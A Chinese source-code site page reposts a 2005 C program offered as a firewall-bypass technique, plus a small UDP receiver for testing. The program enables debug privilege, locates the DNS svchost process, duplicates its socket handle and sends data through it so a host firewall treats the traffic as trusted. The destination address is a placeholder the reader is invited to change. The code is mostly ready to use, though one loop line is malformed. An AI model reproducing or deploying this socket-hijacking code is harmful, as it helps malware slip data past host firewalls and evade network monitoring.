商业源码:策划管理,名企内参,咨询顾问

软盟收藏

用户中心

软件联盟现时:2010年9月8日星期三位于: 源码文档- 开发文档 → 开发技术（其它开发）

穿透防火墙的数据传输源码

2005年5月11日作者：zwell@sohu.com 商业源码:策划管理,名企内参,咨询顾问浏览选项：本文已被浏览 4614 次

穿透防火墙的数据传输源码
源代码部分：
/*++

  Made By ZwelL
  zwell@sohu.com
  2005.4.12
--*/

#include <winsock2.h>
#include <stdio.h>
#include <wtsapi32.h>

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "wtsapi32")

#define NT_SUCCESS(status)          ((NTSTATUS)(status)>=0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

typedef LONG    NTSTATUS;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG            ProcessId;
    UCHAR            ObjectTypeNumber;
    UCHAR            Flags;
    USHORT            Handle;
    PVOID            Object;
    ACCESS_MASK        GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;

BOOL LocateNtdllEntry ( void )
{
    BOOL    ret         = FALSE;
    char    NTDLL_DLL[] = "ntdll.dll";
    HMODULE ntdll_dll   = NULL;

    if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )
    {
        printf( "GetModuleHandle() failed");
        return( FALSE );
    }
    if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, "ZwQuerySystemInformation" ) ) )
    {
        goto LocateNtdllEntry_exit;
    }
    ret = TRUE;

LocateNtdllEntry_exit:

    if ( FALSE == ret )
    {
        printf( "GetProcAddress() failed");
    }
    ntdll_dll = NULL;
    return( ret );
}

/*++
This routine is used to get a process's username from it's SID
--*/
BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)
{
    // sanity checks and default value
    if (pUserSid == NULL)
        return false;
    strcpy(szUserName, "?");

    SID_NAME_USE   snu;
    TCHAR          szUser[_MAX_PATH];
    DWORD          chUser = _MAX_PATH;
    PDWORD         pcchUser = &chUser;
    TCHAR          szDomain[_MAX_PATH];
    DWORD          chDomain = _MAX_PATH;
    PDWORD         pcchDomain = &chDomain;

    // Retrieve user name and domain name based on user's SID.
    if (
        ::LookupAccountSid(
        NULL,
        pUserSid,
        szUser,
        pcchUser,
        szDomain,
        pcchDomain,
        &snu
        )
        )
    {
        wsprintf(szUserName, "%s", szUser);
    }
    else
    {
        return false;
    }

    return true;
}

/*++

This routine is used to get the DNS process's Id

Here, I use WTSEnumerateProcesses to get process user Sid,
and then get the process user name. Beacause as it's a "NETWORK SERVICE",
we cann't use OpenProcessToken to catch the DNS process's token information,
even if we has the privilege in catching the SYSTEM's.

--*/
DWORD GetDNSProcessId()
{
    PWTS_PROCESS_INFO pProcessInfo = NULL;
    DWORD             ProcessCount = 0;
    char              szUserName[255];
    DWORD              Id = -1;

    if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))
    {
        // dump each process description
        for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++)
        {

            if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 )
            {
                GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);
                if( strcmp(szUserName, "NETWORK SERVICE") == 0)
                {
                    Id = pProcessInfo[CurrentProcess].ProcessId;
                    break;
                }
            }
        }

        WTSFreeMemory(pProcessInfo);
    }

    return Id;
}

/*++
This doesn't work as we know, sign...
but you can use the routine for other useing...
--*/
/*
BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)
{
    HANDLE hProcess = NULL,
            hAccessToken = NULL;
    TCHAR InfoBuffer[1000], szDomainName[200];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
    DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;
    SID_NAME_USE snu;

    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);
    if(hProcess == NULL)
    {
        printf("OpenProcess wrong");
        CloseHandle(hProcess);
        return false;
    }

    if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))
    {
        printf("OpenProcessToken wrong:%08x", GetLastError());
        return false;
    }

    GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,
        1000, &dwInfoBufferSize);

    LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,
        &dwAccountSize,szDomainName, &dwDomainSize, &snu);

    if(hProcess)
        CloseHandle(hProcess);
    if(hAccessToken)
        CloseHandle(hAccessToken);
    return true;
}*/

/*++
Now, it is the most important stuff... ^_^
--*/
SOCKET GetSocketFromId (DWORD PID)
{
    NTSTATUS                     status;
    PVOID                        buf   = NULL;
    ULONG                        size  = 1;
    ULONG                        NumOfHandle = 0;
    ULONG                        i;
    PSYSTEM_HANDLE_INFORMATION    h_info  = NULL;
    HANDLE    sock = NULL;
    DWORD    n;

    buf=malloc(0x1000);
    if(buf == NULL)
    {
        printf("malloc wrong\n");
        return NULL;
    }
    status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );
    if(STATUS_INFO_LENGTH_MISMATCH == status)
    {
        free(buf);
        buf=malloc(n);
        if(buf == NULL)
        {
            printf("malloc wrong\n");
            return NULL;
        }
        status = ZwQuerySystemInformation( 0x10, buf, n, NULL);
    }
    else
    {
        printf("ZwQuerySystemInformation wrong\n");
        return NULL;
    }

    NumOfHandle = *(ULONG*)buf;

    h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);

    for(i = 0; i<NumOfHandle i++)
    {
        try
        {
            if( ( h_info[i].ProcessId == PID )  && ( h_info[i].ObjectTypeNumber == 0x1c )
                && (h_info[i].Handle!=0x2c)    // I don't know why if the Handle equal to 0x2c, in my test, it stops at getsockname()
                                            // So I jump over this situation...
                                            // May be it's different in your system,
                ) //wind2000 is 0x1a
            {
                //printf("Handle:0x%x Type:%08x\n",h_info[i].Handle, h_info[i].ObjectTypeNumber);
                if( 0 == DuplicateHandle(
                    OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID),
                    (HANDLE)h_info[i].Handle,
                    GetCurrentProcess(),
                    &sock,
                    STANDARD_RIGHTS_REQUIRED,
                    true,
                    DUPLICATE_SAME_ACCESS)
                    )
                {
                    printf("DuplicateHandle wrong:%8x", GetLastError());
                    continue;
                }

                //printf("DuplicateHandle ok\n");
                sockaddr_in name = {0};
                name.sin_family = AF_INET;
                int namelen = sizeof(sockaddr_in);
                getsockname( (SOCKET)sock, (sockaddr*)&name, &namelen );
                //printf("PORT=%5d\n",    ntohs( name.sin_port ));
                if(ntohs(name.sin_port)>0)    // if port > 0, then we can use it
                    break;
            }
        }
        catch(...)
        {
            continue;
        }
    }

    if ( buf != NULL )
    {
        free( buf );
    }
    return (SOCKET)sock;
}

/*++
This is not required...
--*/
BOOL EnablePrivilege (PCSTR name)
{
    HANDLE hToken;
    BOOL rv;

    TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };
    LookupPrivilegevalue (
        0,
        name,
        &priv.Privileges[0].Luid
        );

    priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    OpenProcessToken(
        GetCurrentProcess (),
        TOKEN_ADJUST_PRIVILEGES,
        &hToken
        );

    AdjustTokenPrivileges (
        hToken,
        FALSE,
        &priv,
        sizeof priv,
        0,
        0
        );

    rv = GetLastError () == ERROR_SUCCESS;

    CloseHandle (hToken);
    return rv;
}

void main()
{
    WSADATA wsaData;
    char    testbuf[255];
    SOCKET    sock;
    sockaddr_in RecvAddr;

    int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
    if (iResult != NO_ERROR)
        printf("Error at WSAStartup()\n");

    if(!LocateNtdllEntry())
        return;

    if(!EnablePrivilege (SE_DEBUG_NAME))
    {
        printf("EnablePrivilege wrong\n");
        return;
    }

    sock = GetSocketFromId(GetDNSProcessId());
    if( sock==NULL)
    {
        printf("GetSocketFromId wrong\n");
        return;
    }

    //Change there value...
    RecvAddr.sin_family = AF_INET;
    RecvAddr.sin_port = htons(5555);
    RecvAddr.sin_addr.s_addr = inet_addr("127.0.0.1");

    if(SOCKET_ERROR == sendto(sock,
            "test",
            5,
            0,
            (SOCKADDR *) &RecvAddr,
            sizeof(RecvAddr)))
    {
        printf("sendto wrong:%d\n", WSAGetLastError());
    }
    else
    {
        printf("send ok... Have fun, right? ^_^\n");
    }

    getchar();

    //WSACleanup();
    return;
}

测试代码部分：

/*++
UdpReceiver
--*/
#include <stdio.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

void main()
{
  WSADATA wsaData;
  SOCKET RecvSocket;
  sockaddr_in RecvAddr;
  int Port = 5555;
  char RecvBuf[1024];
  int  BufLen = 1024;
  sockaddr_in SenderAddr;
  int SenderAddrSize = sizeof(SenderAddr);

  //-----------------------------------------------
  // Initialize Winsock
  WSAStartup(MAKEWORD(2,2), &wsaData);

  //-----------------------------------------------
  // Create a receiver socket to receive datagrams
  RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

  //-----------------------------------------------
  // Bind the socket to any address and the specified port.
  RecvAddr.sin_family = AF_INET;
  RecvAddr.sin_port = htons(Port);
  RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY);

  bind(RecvSocket, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr));

  //-----------------------------------------------
  // Call the recvfrom function to receive datagrams
  // on the bound socket.
  printf("Receiving datagrams...\n");
  while(1)
  {
    recvfrom(RecvSocket,
        RecvBuf,
        BufLen,
        0,
        (SOCKADDR *)&SenderAddr,
        &SenderAddrSize);
    printf("%s\n", RecvBuf);
  }

  //-----------------------------------------------
  // Close the socket when finished receiving datagrams
  printf("Finished receiving. Closing socket.\n");
  closesocket(RecvSocket);

  //-----------------------------------------------
  // Clean up and exit.
  printf("Exiting.\n");
  WSACleanup();
  return;
}

发布人：lala
[ → 我要发表文章 ]

上篇文章：没有找到相关文章
下篇文章：没有找到相关文章

→ 主题所属分类： 开发技术 → 其它开发

→ 『关闭窗口』

热门文章

穿透防火墙的数据传输源码 (4615)

Delphi中如何调用VC++创建的动态链接库? (4590)

使用Delphi和WebServices技术开发短信应用 (4385)

把.NET部署到没有安装Fram的机器上 (4327)

用DELPHI实现的黑客程序技巧集锦 (4181)

最短路径算法源码(VB源码教程) (4135)

ASP.NET添加客户端代码的几种方法 (4112)

提高ASP.NET性能的若干方法 (4079)

利用随机数加密字串的算法(vb) (3941)

Java常见问题大全集 (3941)

最近更新

Google店大欺客：伪开源Android危机四伏 (2月3日)

从各大软件公司笔试压轴题学习SQL语句 (12月31日)

Oracle并行查询发挥多CPU的威力 (7月8日)

SQL Server 2008企业视频讲座 (12月5日)

一个完美的中文大写日期转换函数 (8月1日)

海量数据库的查询优化及分页算法方案 (8月1日)

用友ERP-NC精华实用SQL脚本之：快速复制公司的... (2月21日)

IC卡写卡操作的源码(深圳达实公司) (3月16日)

专家分享Oracle数据库业务优化心得 (1月15日)

多线程验证DoubleCheckedLocking (11月3日)

文章搜索


搜索选项：

→ 评论内容 (点击查看)

（没有相关评论）

→ 发表我的评论

您的姓名：	您的E-mail：
评论内容：
发表评论：


关于我们┋ 咨询反馈┋ 合作媒体┋ 免费金币┋ 行业管理┋ 名企内参┋ 矢量图库┋ 素材模板┋ 客户名录┋ 快乐淘宝┋ 广告合作┋ 网站地图

本站总访问量: 19762533 人次 ┋ 围观高峰 948 人在线 ┋ 现时围观 41 人
商业源码:策划管理,名企内参,咨询顾问 [节能型] ┋联系邮件服务QQ：308071592
软件创业联盟 ©2002-2018 版权所有浙ICP备09028508号电话:0571-8590-3599